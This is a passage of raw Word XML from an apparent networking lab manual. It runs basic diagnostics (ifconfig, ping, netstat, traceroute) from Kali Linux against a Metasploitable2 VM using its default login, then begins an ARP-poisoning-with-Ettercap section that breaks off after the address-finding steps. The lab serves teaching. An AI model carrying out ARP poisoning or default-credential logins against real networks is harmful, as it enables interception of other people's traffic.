      </w:pPr>
    </w:p>
    <w:p w14:paraId="05617ADB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Identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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2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Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B2D384" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="240" w:line="448" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="7266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 xml:space="preserve">On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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 Login using: Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-15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msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b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Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72692C04" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="8"/>
        <w:ind w:left="1888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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47CA9714" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="242"/>
        <w:ind w:left="448"/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Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212BD65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Identify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2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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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of</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6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pacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F8B171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3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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BC2F84" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="188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inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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addr:192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199AC039" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CD1C27" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="60" w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5885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Test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Connectivity ping &lt;Metasploitable2_IP&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDEF04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36"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Verifies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whether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can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reach</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-6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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C87470B" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="243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Confirms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both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machines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same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network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD3BA0" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="24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Successful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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A53FAB" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="242" w:line="451" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="313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64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bytes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from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192.168.56.102:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7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icmp_seq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6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ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=64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time=0.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6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ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stop the Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58885517" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="273" w:lineRule="exact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Press:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0135489F" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="243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CTRL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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742FB980" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="24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If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Ping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Fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC571D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Check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VM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adapter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settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6E367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Ensure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both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machines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use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same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mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDEC786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Disable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firewall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temporarily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(for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lab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only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999491B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3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Verifies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reachability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between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Linux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5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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48965A2A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4B0DD06E" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="168"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C01D743" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="505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View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Active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Connections netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>antpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="032FACC5" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="60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5703B3D8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3"/>
        <w:ind w:left="116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Displays:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44173ABD" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="240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Active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connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A354A43" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="235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Listening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ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796ED1DD" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="231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 xml:space="preserve">Running </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B761036" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1887"/>
        </w:tabs>
        <w:spacing w:before="235"/>
        <w:ind w:left="1887" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Associated</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B58A415" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="232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Sample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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BA9DF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2286"/>
          <w:tab w:val="left" w:pos="3687"/>
          <w:tab w:val="left" w:pos="4810"/>
          <w:tab w:val="left" w:pos="5391"/>
        </w:tabs>
        <w:spacing w:before="243" w:line="451" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="313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Proto Local Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="8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Foreign Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="8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</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">PID/Program </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="8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0.0.0.0:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0.0.0.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LISTEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1234/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68D0ADBF" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="273" w:lineRule="exact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Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A65B25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Port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22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SSH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running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11035D5B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LISTEN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waiting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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49212767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PID/Program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Process using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port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F16EDD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1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Displays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active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connections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listening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services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2436E2F6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68ADC690" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="170"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA7824A" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="417" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="607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 5: Trace Network Route traceroute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&lt;Metasploitable2_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E3403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0" w:line="448" w:lineRule="auto"/>
        <w:ind w:right="3524" w:firstLine="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Displays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route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take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reach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host </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E3CEB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Shows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take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from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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153D772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4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Identifies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hops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(routers)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between</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BADE47E" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="243"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545DF9C1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00700285" w:rsidRDefault="0061574E" w:rsidP="00700285">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="0061574E" w:rsidRPr="00700285" w:rsidSect="0061574E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DB800A" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00700285">
      <w:pPr>
        <w:spacing w:before="24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lastRenderedPageBreak/>
        <w:t>Sample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Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CBD1D5" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="24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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5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192.168.56.102</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="6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0.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5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0.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5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0.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E3D95D3" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="243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Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA97107" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="24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Hop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1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Destination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reached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directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E620E48" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="24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Few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hops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=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same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local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network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAB9FE" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:before="243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More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hops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=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routed through </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gateways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62F15A" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D1E209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Kali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Linux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interfaces were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analyzed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9616A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41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Connectivity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2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>verified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AF9F2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41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Active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services</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D39BF9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4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Packet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routing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understood</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511357E1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6E1F23F6" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB375C6" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:line="448" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="429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B: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ARP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Poisoning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Ettercap Step 1: Identify IP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Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA0BDC" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="240" w:lineRule="exac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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265FC71" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="1168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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D926F44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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3530E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Kali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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31560146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spacing w:before="202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interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (eth0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7BB551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10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7CAED" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="204"/>
        <w:ind w:left="1168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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E60D285" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="205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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73790BC9" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:ind w:left="116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address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C60533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18C22DA7" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5E1504" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="1" w:line="415" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="5885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Identify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Default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Gateway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Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705920E1" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:spacing w:before="2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route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</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F3D45" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
